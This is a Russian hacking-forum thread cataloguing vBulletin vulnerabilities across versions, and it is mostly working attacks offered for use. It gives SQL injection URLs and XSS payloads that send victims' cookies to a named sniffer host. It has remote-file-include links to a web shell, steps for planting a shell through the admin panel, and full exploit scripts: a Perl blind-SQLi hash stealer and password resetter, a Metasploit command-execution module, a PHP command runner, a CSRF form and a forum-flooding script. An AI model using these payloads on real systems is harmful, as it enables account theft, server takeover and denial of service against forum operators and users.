ВНИМАТЕЛЬНО ЧИТАЕМ ПРАВИЛА ПРЕЖДЕ ЧЕМ ЗАДАТЬ ВОПРОС! На форуме есть обзоры уязвимостей ipb и phpbb, я решил сделать обзор уязвимостей vBulletin-). Итак начну. Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*. Узнаём версию форума. В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума. Code: [COLOR=YellowGreen]vbulletin_ajax_threadslist.js vbulletin_ajax_namesugg.js vbulletin_attachment.js vbulletin_cpcolorpicker.js vbulletin_editor.js Пример:[/COLOR] Code: [COLOR=YellowGreen]www.xz.сom/forumpath/clientscript/vbulletin_editor.css[/color] vBulletin 2 2.2.* - 2.2.4 - Выполнение произвольного кода Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'. Exploit: http://www.securitylab.ru/vulnerability/source/207147.php 2.3.* - SQL injection Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate[/COLOR] 2.*.* - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email. Exploit: Code: [COLOR=YellowGreen][E*MAIL][email protected]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));[/COLOR] Video: http://video.antichat.ru/file57.html vBulletin 3.0 3.0.0 - XSS Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> [/COLOR] 3.0-3.0.4 - Выполнение произвольных команд Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."[/COLOR] О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html 3.0.3–3.0.9 XSS Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы. Пример: Code: [COLOR=YellowGreen]<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>[/COLOR] 3.0.9 and 3.5.4 - XSS Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0[/COLOR] vBulletin 3.5 3.5.2 - XSS Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: [COLOR=YellowGreen]TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> BODY:---------->No matter OTHER OPTIONS:->No matter[/COLOR] Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie. 3.5.3 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member". Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/profile.php?do=editpassword pass:your pass email: [email protected]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt Note About lenght limitation **** forum/profile.php?do=editoptions Receive Email from Other Members=yes **** www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}[/COLOR] Пояснение: заходим в профиль и в поле email прописываем [email protected]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер. 3.5.4 - Дамп БД Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения. Пример: Code: [COLOR=YellowGreen]www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord[/COLOR] 3.5.4 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a[/COLOR] Уязвимости в модулях vBulletin. vBug Tracker 3.5.1 - XSS Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E[/COLOR] ImpEx 1.74 - PHP-инклюдинг и выполнение команд Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: Code: [COLOR=YellowGreen](1) www.xz.сom/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt www.xz.сom/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd (2) www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id (3) www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id (4) www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id [/COLOR] Exploit: http://www.securitylab.ru/vulnerability/source/264410.php ibProArcade 2.x - SQL injection Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: Code: [COLOR=YellowGreen]www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user][/COLOR] Где [any_user] id нужного нам юзера. При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru. Шелл в vBulletin. Разберёмся как залить шелл из админки воблы. Способ заливки шелла в vBulletin 2.*.* и 3.0.* 1. Заходим в админку. 2. Смайлы. 3. Загрузить смайл. 4. Грузим наш шелл. (папка по умолчанию /images/smilies) 5. Заходим www.xz.сom/forumpath/images/smilies/shell.php Примечание: сработает не везде. Способ заливки шелла в vBulletin 3.5.*. 1. Заходим в админку. 2. Система модулей. 3. Добавить новый модуль. Продукт: ставим vBulletin Месторасположение: Vbulletin: Справка - faq_complete Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]); 4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда Видео по теме: http://video.antichat.ru/file105.html http://video.antichat.ru/file95.html http://video.antichat.ru/file57.html http://video.antichat.ru/file3.html З.Ы. Сильно не ругаться. Если где-то был не прав, исправляем, если что-то упустил, добавляем... Не стал вылаживать некоторые XSS т.к. версия форума у них повторяется...
Passive XSS vBulletin 3.6.x Admin Control Painel еще дополнение: Code: Author: insanity E-mail: [email protected] XSS vBulletin 3.6.1 Admin Control Panel http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs="><script>alert("insanity")</script> http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script>alert("insanity")</script>
Backup SQL-Dump Bypass vBulletin 3.5.х www.xz.com/forumpath/install/upgrade_301.php?step=backup вот это не стесняйтесь смело подставлять ко всей линейке 3.5.х, особливо к 3.5.1, проверено. Уязвимы особенно нуленые версии vBulletin
VBulletin 3.6.4 [FLASH] (SWF) XSS VBulletin 3.6.4 Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie. Пример: Code: getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();"); Информация по эксплуатации уязвимости описана ниже http://forum.antichat.ru/showpost.php?p=558935&postcount=28
Active XSS TopXStats В список "уязвимости модулей" не плохо было бы так же добавить дыру в моде TopXStats (Статистика Х лучших). Ее легко узнать - в низу форума есть таблица с послденимим затронутыми темами. лучшими авторами и .т.п, таблица так и называется "Статистика лучших". Пару месяцев назад там нашли дыру - не было фильтрации выходных данных, вернее на выходе данные спокойно трансформировались в html Достаточно создать тему в заголовке которой указать код редиректинга на свой сайт, и псевдодефейс готов. Через meta redirect например. Тогда с гл. страници пользователей будет перенаправлять на ваш дефейс. Для дыры достаточно скоро был выложен патч на Vbulletin.net.ru , но не все его установили, и некоторые все еще ставят старую версию хака (не пропатченную). Так что флаг вам в руки. Вместо meta redirect'a можно так же вставить сниффер, но поле "тема" имеет ограничение на кол-во символов, так что может не поместиться.
эксплоит для флуда форума Вот прикольный эксплоит для флуда форума. Конечно это не поможет при взломе. но всётаки достаточно серьёзный баг. Code: <? set_time_limit(60); //You can change 10 to other numbers for($i = 1 ; $i <= 10 ; $i++) { //to put curl to send POST request $ch = curl_init(); //change http://localhost/vb3 to the url of the script curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php'); curl_setopt($ch , CURLOPT_POST , 1) ; curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1'); curl_exec($ch); curl_close($ch); } //Flood finished good luck ?> Кстати видел данный эксплоит на перле, он реализован с помощю сокетов, работает гораздо быстрее (не показывает каждый раз форму регистрации), и соответственно кушает меньше трафика. В принципе с помощю этого скрипта переполнить базу данных и остановить работу форума и даже сайта, т.к большинство хостеров ставят ограничение на обьём базы данных, достигнув который, в базу данных уже ничего нельзя будет записать, не почистив её.
Active XSS [attachment.php] vBulletin 3.x Вот свеженький баг, сам не проверял. Программа: vBulletin 3.x Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Автор: semu Дата: 08.02.2007 21:15:43 Чтобы юзать - должен быть доступ к админке, вобщем пригодиться конечно может в некоторых случаях.
XSRF vBulletin 3.0.0 Вот ещё для полноты темы: Робит только vBulletin 3.0.0 Beta 2 Уязвимость в проверке правильности ввода обнаружена в vBulletin при просмотре честных сообщений. Удаленный пользователь может выполнить XSS нападение. Сообщается, что сценарий private.php не фильтрует данные, представленные пользователем. Удаленный пользователь может сконструировать специально сформированную Web форму, которая, при загрузке в браузере пользователя, выполнить произвольный код сценария в браузере целевого пользователя в контексте vBulletin сайта. Пример: (требуется предварительная авторизация) Code: <html> <body> <form action="http://[victim]/forum/private.php" method="post" name="vbform"> <input type="hidden" name="do" value="insertpm" /> <input type="hidden" name="pmid" value="" /> <input type="hidden" name="forward" value="" /> <input type="hidden" name="receipt" value="0" /> <input type="text" class="bginput" name="title" value="" size="40" tabindex="2"/> <textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea> <input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /> <input type="submit" class="button" value="Preview Message" access key="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5"> <input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked"/> <input type="checkbox" name="signature" value="1" id="cb_signature" /> <input type="checkbox" name="parseurl" value="1" id="cb_parse url" checked="checked" /> <input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /> </form> <script> //Set Values and Submit // You can write your own JS codes var xss = "\"><script>alert(document.cookie)<\/script>"; document.vbform.title.value=xss; document.vbform.preview.click(); </script> </body> </html> Уязвимость обнаружена в vBulletin 3.0.0 Beta 2.
Code EXEC vBulletin 3.0.6 Помойму этого тоже не было ,если не ошибаюсь: Программа: vBulletin 3.0.6 и более ранние версии Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web-сервера. Уязвимость существует при обработке имен шаблонов в сценарии 'misc.php' при включенной опции 'Add Template Name in HTML Comments' (не является значением по умолчанию). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный код на системе. Пример: Code: http://[target]/misc.php?do=page&template={${phpinfo()}} Этот и предыдущий пост хорошо-бы перенести в начало темы, к ранним версиям воблы.
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии супермодератора) http://milw0rm.com/exploits/3387 Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. http://www.xakep.ru/post/36982/default.asp
Ссылки на темы связанные с безопастностью (уязвимостями) vBulletin. Vbulletin 3.6.x: Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ. ---------------------------------------------------------- Все сообщения не содержащие информационной ценности или не имеющие прямого отношения к теме удалены. ---------------------------------------------------------- Ещё раз напомню, что в этой теме обзор уязвимостей форума, сообщения не имеющие информационной ценности ("Немогли бы взглянуть на этот форум", "Подскажите версию" и т.д.) будут удаляться.
Vbulletin Petz module all version Не смог найти тему куда выложить сплойт, выложил сюда, если что модеры перенесите. Вообщем сплойт дёргает пароль у заданного юзера, если сплойт не остановить, то он этому юзеру еще и сменит пароль. Новый пароль из хеша состоит только из цифр размером 8 символов. Code: #!/usr/bin/perl # Vbulletin module Petz with sql-injection. # coded by k1b0rg(768620) # # This exploit changing your buyer. # A new password consists of figures, the length of 8 and going to take a great brut of time(passwords pro);) # If you do not need to change the password, simply stop exploit at the time of the removal of the password. # Running exploit again sent two letters to the box. Be akkuratney. # In the first test of vulnerability when sql error, the box webmaster sent a letter of error. Be akkuratney. # # dork: inurl:petz.php # # download module: http://dev.p3tz.com/ # # Lamers go to жопа. # exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1 # # needly: # mysql >=4 # magic_quotes off # direct hands # # greets: antichat.ru mini-rinok.ru # use LWP::UserAgent; use Getopt::Std; use strict; my %opts; getopts("i:p:l:P:s:e:u:",\%opts); my $url=$opts{u}; my $id=$opts{i} || 9107; my $prefix=$opts{P} || ''; my $password1=$opts{p}; my $salt1=$opts{s}; my $length=$opts{l}; my $email1=$opts{e}; if(!$url || !$id) { echo('-------------------------FUCK YOU SPILBERG!----------------------'); echo('Petz sql injection'); echo('Founded and coded by k1b0rg(768620)'); echo('exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1'); echo('-------------------------FUCK YOU SPILBERG!----------------------'); exit; } my $browser = LWP::UserAgent->new(); $browser->requests_redirectable([]); echo('Petz sql injection'); echo('Founded and coded by k1b0rg(768620)'); ########check on vuln and getting prefix####################################### echo('[\] Step 0: [Checking vuln]'); my $res=$browser->get($url.'petz.php?do=view&id=9995681\''); if($res->content=~/Database error/i) { echo('[|] This script is vulnerable!!!!'); $res->content=~/LEFT JOIN (.*?)user/i; echo('[/] Prefix is: ['.$1.']'); } else { echo('[|] This script NOT vulnerable!!!!'); exit; } ########password1####################################### echo('[-] Step 1: [getting password(one) user by id ['.$id.']'); echo('[\] Password(1): ['); if(!$password1) { for(1..32) { my $pos=$_; for(48..57,97..103) { my $asc=$_; if($asc==103) {echo('EXPLOIT FAILED]',0); exit;} my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*'); if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); last; } } } } else { echo($password1,0); } echo(']',0); ########salt1####################################### echo('[|] Step 2: [getting salt(one) user by id ['.$id.']'); echo('[-] Salt(1): ['); my $salt; if(!$salt1) { for(1..3) { my $pos=$_; for(33..126) { my $asc=$_; my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(salt,'.$pos.',1))='.$asc.')/*'); if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $salt.=chr($asc); last; } } } } else { $salt=$salt1; echo($salt,0); } echo(']',0); ########Checking email length####################################### echo('[\] Step 3: [Checking email length ['.$id.']'); echo('[|] Email length: ['); my $num; if(!$email1) { if(!$length) { for(6..32) { $num=$_; my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(length(email)='.$num.')/*'); if($res->content!~/Untrapped Error/is) {echo($num,0); last; } } } else { $num=$length; echo($num,0); } } else { $num=length($email1); echo($num,0); } echo(']',0); ########losting email####################################### echo('[/] Step 4: [getting email user by id ['.$id.']'); echo('[-] Email: ['); my $email; if(!$email1) { for(1..$num) { my $pos=$_; for(48..57,64,97..122) { my $asc=$_; my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(lower(substring(email,'.$pos.',1)))='.$asc.')/*'); if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $email.=chr($asc); last; } } } } else { $email=$email1; echo($email,0); } echo(']',0); ########lost_password####################################### echo('[\] Step 5: [Losting password]'); $browser->post($url.'login.php', [ email=>$email, do=>'emailpassword' ]); ########losting activationid####################################### echo('[|] Step 7: [getting activationid user by id ['.$id.']'); echo('[/] activationid: ['); my $valid; for(1..8) { my $pos=$_; for(48..57) { my $asc=$_; my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'useractivation+WHERE+userid=\''.$id.'\'+and(ascii(substring(activationid,'.$pos.',1))='.$asc.')/*'); if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $valid.=chr($asc); last; } } } echo(']',0); ########lost_password####################################### echo('[-] Step 8: [Losting password]'); $browser->get($url.'login.php?a=pwd&u='.$id.'&i='.$valid); ########password2####################################### echo('[\] Step 9: [getting password(two) user by id ['.$id.']'); echo('[|] Password(2): ['); my $newhash; for(1..32) { my $pos=$_; for(48..57,97..102) { my $asc=$_; my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*'); if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $newhash.=chr($asc); last; } } } echo(']',0); echo('News hash && salt: ['.$newhash.':'.$salt.']'); sub echo{ my $text=shift; my $param=shift; my $razdel=($param eq 0)?'':"\n"; syswrite STDOUT,$razdel.$text; }
Passive XSS [downloads.php] vBulletin 3.6.2 vBulletin 3.6.2 Пассивная хсс Уязвим параметр "id" скрипта "downloads.php" Пример: http://forum.asechka.ru/downloads.php?do=cat&id=5"><script>alert()</script>
XSS [PDF] vBulletin 3.0.7 - 3.6.2 vBulletin 3.0.7 - 3.6.2 Активная хсс прикрепляем файл pdf созданный с содержанием: Code: <script>alert()</script> и при открытии этого файла вылезает алерт. этот способ работает в очень многих местах, также как и встраивание кода в картинку. минус этого способа, что не во всех местах можно прикреплять файлы.
Active XSS in Title vBulletin 3.5.2 Программа: vBulletin 3.5.2 http://www.securitylab.ru/vulnerability/source/243694.php Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «title» сценарием calendar.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Code: TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> BODY:---------->No matter OTHER OPTIONS:->No matter Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.
vBulletin 3.0.10 SQL Injection Code: http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/* vBulletin 3.0.6 Command Execution Exploit (metasploit) Code: ## # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit # Name: php_vb3_0_6.pm # License: Artistic/BSD/GPL # Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. # # # - This is an exploit module for the Metasploit Framework, please see # http://metasploit.com/projects/Framework for more information. ## package Msf::Exploit::php_vb3_0_6; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution flaw in vBulletin <= 3.0.6. }), 'Refs' => [ ['MIL', '832'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['vBulletin'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') || $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; # Encode the command as a set of chr() function calls my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); # Create the get request data my $data = "?do=page&template={\${passthru($byte)}}"; my $req = "GET $path$data HTTP/1.1\r\n". "Host: $vhost:$target_port\r\n". "Content-Type: application/html\r\n". "Content-Length: ". length($data)."\r\n". "Connection: Close\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $self->PrintLine("[*] Sending the malicious vBulletin Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); return; } 1; vBulletin 3.0.4 Execute command magic_quotes_gpc должен быть выключен PHP: <?php if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } if ($argv[3]){ $url = $argv[1]; $forumid = intval($argv[2]); $command = $argv[3]; } else { echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n"; echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n"; echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n"; echo "<forumid> forum id\n"; echo "<command> command to execute on server (ex: 'ls -la')\n"; echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n"; echo "ex :\n"; echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\""; exit; } if ($argv[4]) $proxy = $argv[4]; $action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."'; $ch=curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.'/'.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $res = substr($res, strpos($res, '_START_')+7); $res = substr($res,0, strpos($res, '_END_')); echo $res; ?>
узнать версию форума Вот что нашел.. Чтобы узнать версию форума.. иногда помогает.. http://domain/forum/install/finalupgrade.php И видим версию форума
Active XSS v3.6.8 тут вроде бы не звучало еще 2 ХССки... не знаю точно в каких версиях но на 3.6.2 и 3.6.4 помоему работало... В первом случае надо быть модератором (иметь право банить) и надо чтоб на форуме при бане было поле "причина" вот само поле "причина" и есть уязвимым... ищем жертву для бана и в причине вписываем Code: Забанен за флуд <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script> теперь допустим хотим словить админа - скажите пусть зайдет посмотрит почему забанен пользователь или попросить разбанить из-за ошибки ( в общем придумать причину не тяжело) ) Во втором случае надо иметь возможность менять себе "Особый статус" и поддержку хтмл... Code: Мой титул <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script> А там думаю загадочного нечего нету )) но это испытывал всего один раз... надо быть или знакомым админа или еще какието обстоятельство )) _На некоторых сайтах стоит фикс типа ограничения колиества символов в строке ) -------------------------------------------------------------------- Добавленно от BlackCats (фактически тоже самое инфа про версию другая): 3.6.8 Patch.Level 1 active xss: если вы модератор на форуме, то при бане в поле "причина бана" указываете ваш скрипт, и он сработает: при просмотре забаненых пользователей через: модпанель(например туда может зайти СуперМодератор) админ панель(админ) когда зайдёт юзер в свой акк(сам юзер) PHP: clientscript/ieprompt.html какойто недописанный скрипт. PHP: global.php или arhive/global.php в некоторых случаях раскрытие путей
Active XSS in Tag [google] & [googlevideo] Активная xss в популярном теге для булки - google и googlevideo Code: [google*video][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google*video]123 [google][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google]123
Code Exec + Xss vBulletin v3.6.5 Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: [site]/vb/includes/functions.php?classfile=[Shell-Attack] [site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack] [site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack] vBulletin V3.6.8 Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: [site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match= all&titlesonly=0 